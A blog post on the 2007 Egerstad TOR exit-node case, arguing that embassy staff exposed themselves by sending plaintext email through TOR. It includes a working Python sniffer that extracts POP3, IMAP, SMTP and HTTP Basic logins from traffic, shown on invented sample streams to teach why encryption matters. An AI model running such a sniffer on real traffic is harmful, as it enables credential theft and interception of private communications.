« "I don't think it means what you think it means..." | Main | Aikido Journal: The Eye and the Mind »

November 15, 2007

Swedish Police Bust International Super Hacker

Alright, so...not really. Earlier this year Dan Egerstad, a Swedish security consultant, ran an experiment on the Internet. Every account of the "hack" describes it in terms similar to this one, from the Sydney Morning Herald:

...intercepted data carried over a global communications network used by embassies around the world in August and gained access to 1000 sensitive email accounts. They contained confidential diplomatic memos and other sensitive government emails. The hack required little more than tools freely available on the internet...

As reported in the SMH, Egerstad was picked up for questioning by the Swedish equivalent of the FBI and CIA. Not so bad: a dangerous hacker who infiltrates "global communications networks" is off the streets. Score one for the Cyber Justice League. Right, but not really...

TOR (aka The Onion Router) is an anonymity network, a project originally sponsored by the Electronic Frontier Foundation (EFF). TOR's purpose is to make anonymous communication possible over an unsecured network: it hides where your traffic comes from, not what it says. Of course, it would seem that lots of people use TOR without even a cursory look at its website. Here are some interesting tidbits from the Warnings section on TOR's download page:

1. Tor only protects Internet applications that are configured to send their traffic through Tor — it doesn't magically anonymize all your traffic just because you install it.

4. Tor anonymizes the origin of your traffic, and it encrypts everything inside the Tor network, but it can't encrypt your traffic between the Tor network and its final destination. If you are communicating sensitive information, you should use as much care as you would on the normal scary Internet — use HTTPS or other end-to-end encryption and authentication.

It turns out that shiny toys do not a security policy make. Employees of various embassies around the world were reading and sending confidential diplomatic memos over plaintext e-mail protocols, routed through TOR. TOR encrypts the hop into the network and the hops between relays, but the last hop, from the exit node to the mail server, carries whatever the application handed over. If that was plaintext, the exit node operator sees it in the clear, password included. Really? Nowhere in the guidebook does it say "When sending confidential memos make sure to encrypt your traffic, or at least use HTTPS"?

So, let's have a quick rundown of what our super hacker did.

  • He installed TOR (freely available) at a few locations and configured each one as an exit node, the last hop that hands traffic from the TOR network to its real destination
  • He installed a packet sniffer (such as Wireshark, also freely available) on the same machines
  • Other TOR users' traffic that happened to leave the network through his exit nodes passed through his computers in whatever form the sending application produced it. Some of it was confidential, and some of it included usernames and passwords in the clear
  • After collecting somewhere around 1000 logins for various e-mail accounts, our hacker tried to contact the owners to let them know what they were doing wrong.
  • Receiving no response, he posted 100 of the logins to the Internet to generate publicity for the problem.
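
To make the third step concrete, here is an added example of the sniffer logic, written for this post in Python; it is not Egerstad's tool and not TOR project code. It runs over a handful of constructed client-to-server streams of the kind an exit node forwards toward the destination server, pulls the login out of plaintext POP3, IMAP, SMTP AUTH PLAIN and HTTP Basic, and gets nothing from the same login sent over TLS. The hostnames (under the reserved .invalid domain), user names and passwords are made up.

```python
"""What a TOR exit node sees: a plaintext-credential sniffer over reassembled
TCP streams.  Added example for this post, not Egerstad's tool and not TOR
project code.  Hosts (.invalid), users and passwords below are invented."""
import base64
import re
from dataclasses import dataclass
from typing import Callable, List, Optional

@dataclass
class Stream:
    """One client->server TCP stream as the exit node forwards it to the server."""
    dst_host: str
    dst_port: int
    payload: bytes

@dataclass
class Credential:
    proto: str
    host: str
    user: str
    password: str

TLS_PORTS = {443, 465, 993, 995}

def is_tls(s: Stream) -> bool:
    """A TLS record starts with content type 0x16 (handshake) and major version
    0x03; with that (or a well-known TLS port) the payload is opaque to the exit."""
    p = s.payload
    return s.dst_port in TLS_PORTS or (len(p) >= 3 and p[0] == 0x16 and p[1] == 0x03)

def _text(b: bytes) -> str:
    return b.decode("utf-8", errors="replace")

def _pop3(s: Stream) -> Optional[Credential]:
    # POP3 sends user name and password as two bare commands.
    user = re.search(rb"^USER (\S+)\r?$", s.payload, re.M)
    pw = re.search(rb"^PASS (\S+)\r?$", s.payload, re.M)
    if user and pw:
        return Credential("pop3", s.dst_host, _text(user.group(1)), _text(pw.group(1)))
    return None

def _imap(s: Stream) -> Optional[Credential]:
    # IMAP: <tag> LOGIN <user> <password>, each a bare atom or a quoted string.
    m = re.search(rb'^\S+ LOGIN ("[^"]*"|\S+) ("[^"]*"|\S+)\r?$', s.payload, re.M)
    if not m:
        return None
    user, pw = (_text(g.strip(b'"')) for g in m.groups())
    return Credential("imap", s.dst_host, user, pw)

def _smtp_auth_plain(s: Stream) -> Optional[Credential]:
    # SMTP AUTH PLAIN carries base64("\0user\0password"): encoding, not encryption.
    m = re.search(rb"^AUTH PLAIN (\S+)\r?$", s.payload, re.M)
    if not m:
        return None
    try:
        _authzid, user, pw = base64.b64decode(m.group(1)).split(b"\0")
    except ValueError:  # bad base64 or wrong field count
        return None
    return Credential("smtp", s.dst_host, _text(user), _text(pw))

def _http_basic(s: Stream) -> Optional[Credential]:
    # HTTP Basic auth is base64("user:password") in a request header.
    m = re.search(rb"^Authorization: Basic (\S+)\r?$", s.payload, re.M | re.I)
    if not m:
        return None
    try:
        user, _, pw = _text(base64.b64decode(m.group(1))).partition(":")
    except ValueError:
        return None
    return Credential("http", s.dst_host, user, pw)

HANDLERS: List[Callable[[Stream], Optional[Credential]]] = [
    _pop3, _imap, _smtp_auth_plain, _http_basic]

def sniff(streams: List[Stream]) -> List[Credential]:
    """Run every plaintext-protocol handler over each stream.  TLS streams are
    skipped: the exit node learns where they go, not what they carry."""
    found: List[Credential] = []
    for s in streams:
        if is_tls(s):
            continue
        for handler in HANDLERS:
            cred = handler(s)
            if cred:
                found.append(cred)
    return found

# Constructed sample traffic, as it would leave the exit node toward each server.
SAMPLE_STREAMS = [
    Stream("pop.embassy.invalid", 110, b"USER attache\r\nPASS Diplomat1c!\r\nSTAT\r\n"),
    Stream("imap.embassy.invalid", 143,
           b'a001 LOGIN "consul" "Visa-2007"\r\na002 SELECT INBOX\r\n'),
    Stream("smtp.embassy.invalid", 587,
           b"EHLO laptop\r\nAUTH PLAIN " + base64.b64encode(b"\0clerk\0w1nter") + b"\r\n"),
    Stream("webmail.embassy.invalid", 80,
           b"GET /mail/ HTTP/1.1\r\nHost: webmail.embassy.invalid\r\nAuthorization: Basic "
           + base64.b64encode(b"envoy:Secr3t") + b"\r\n\r\n"),
    # The same IMAP login over TLS (port 993): only a ClientHello record is visible.
    Stream("imap.embassy.invalid", 993,
           b"\x16\x03\x01\x00\x2c\x01\x00\x00\x28\x03\x03" + b"\x00" * 32),
]

if __name__ == "__main__":
    for c in sniff(SAMPLE_STREAMS):
        print(f"{c.proto:5} {c.host:24} {c.user}:{c.password}")
    print(sum(is_tls(s) for s in SAMPLE_STREAMS), "TLS stream(s) skipped")
```

Run it and four logins print; the fifth stream, the IMAP session on port 993, yields nothing because the exit node only ever forwards ciphertext. That is warning 4 above in practice: the exit node sits between the user and the server by design, and the only thing that stops its operator from reading the mail is end-to-end encryption that the client chose to use. Note that SMTP AUTH PLAIN and HTTP Basic look scrambled on the wire but are base64, which any sniffer undoes in one call.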

With the exception of the last, everything seems pretty out in the open. Although what to do when you find a critical security issue and nobody will listen to you is an old problem, and one that I won't go into now. Still, going by the article, the police response seems like an extreme measure against somebody who was trying to keep everything out in the open.
